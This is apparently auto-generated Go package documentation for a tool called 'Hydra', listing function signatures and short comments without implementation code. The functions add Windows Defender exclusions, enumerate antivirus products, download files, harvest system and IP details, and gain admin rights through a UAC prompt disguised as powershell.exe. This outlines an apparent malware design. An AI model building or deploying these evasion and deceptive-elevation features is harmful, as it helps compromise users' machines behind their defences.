Documentation
¶
Index ¶
- Constants
- Variables
- func AddDefenderExclusion(path string) error
- func AntiInfo() string
- func CPUInfo() string
- func Calm()
- func CondenseAntiList(antis []*anti) map[string]byte
- func CopyFile(src, dst string) error
- func DownloadFile(filepath string, url string) error
- func ElevateDisguised() error
- func ElevateLogic() error
- func ElevateNormal() error
- func Fb64(text string) (string, error)
- func FileF64(text string, tag string) (string, error)
- func FileT64(file string) string
- func Find(slice, elem interface{}) bool
- func GPUInfo() string
- func Gate(recp string) bool
- func GrabPIP(fmt bool) string
- func Handle(err error, str ...interface{})
- func Info() string
- func IsUserAdmin() bool
- func IsWritable(path string) bool
- func MemoryInfo() string
- func ParseAntiState(state int) byte
- func ParseAntisByClass(class string) []*anti
- func Register(info string) (string, string)
- func RemoveDefenderExclusion(path string) error
- func RemoveDuplicates(slice []string) []string
- func RemoveDuplicatesValues(arrayToEdit []string) []string
- func RunAsAdmin(command, arguments string) error
- func RunDecrypt(cipherKey []byte, msg string) string
- func RunEncrypt(cipherKey []byte, msg string) string
- func RunningAsAdmin() bool
- func SSf64(text string, tag string) (string, error)
- func SSt64(b []byte) string
- func SoftwareInfo() string
- func Tb64(text string) string
- func ToBase64(b []byte) string
- func UpdateStats([]int)
- func WriteLog(ltype string, message string)
Constants ¶
const ( IPProvider = "http://api.ipify.org" Soul = "8894fafe64c043b62" Version = "0.1" Debug = true )
Variables ¶
var ( Doze int = 5 Dem bool = false Dbg bool = false ID string = "IDKey" Mycellium string = "SecretAccessKey" StartTime = time.Now() )
var SysInf string
Functions ¶
func AddDefenderExclusion ¶
func AntiInfo ¶
func AntiInfo() string
AVInfo returns information about installed antivirus products.
func Calm ¶
func Calm()
Calm consumes top-level errors. Defer this if you want to be absolutely certain that local errors should be ignored.
func CondenseAntiList ¶
func CopyFile ¶
CopyFile attempts to copy a file from src to dst. Attributes are not preserved. Environment variables in paths are not supported.
func DownloadFile ¶
DownloadFile will download a url to a local file. It's efficient because it will write as it downloads and not load the whole file into memory.
func ElevateDisguised ¶
func ElevateDisguised() error
ElevateDisguised attempts to relaunch Hydra with admin rights. It displays a common UAC prompt to the user, containing the details of an executable signed by Microsoft, namely powershell.exe.
func ElevateLogic ¶
func ElevateLogic() error
func ElevateNormal ¶
func ElevateNormal() error
ElevateNormal attempts to relaunch Hydra with admin rights. It displays a common UAC prompt to the user, with the name of the executable.
func Handle ¶
func Handle(err error, str ...interface{})
Handle will panic when given a valid error and print some debug info.
func IsUserAdmin ¶
func IsUserAdmin() bool
IsUserAdmin checks if the current user is an administrator. If the process is impersonating a user, it will return that value.
func IsWritable ¶
IsWritable return whether a path or a file is writable.
func MemoryInfo ¶
func MemoryInfo() string
func ParseAntiState ¶
func ParseAntisByClass ¶
func ParseAntisByClass(class string) []*anti
func RemoveDefenderExclusion ¶
func RemoveDuplicates ¶
RemoveDuplicates returns a new slice with duplicate elements removed.
func RemoveDuplicatesValues ¶
RemoveDuplicatesValues: A helper function to remove duplicate items in a list
func RunAsAdmin ¶
RunAsAdmin attempts to execute a command with admin rights.
func RunDecrypt ¶
func RunEncrypt ¶
func RunningAsAdmin ¶
func RunningAsAdmin() bool
RunningAsAdmin returns whether the current process has administrative privileges.
func SoftwareInfo ¶
func SoftwareInfo() string
func UpdateStats ¶
func UpdateStats([]int)
Types ¶
This section is empty.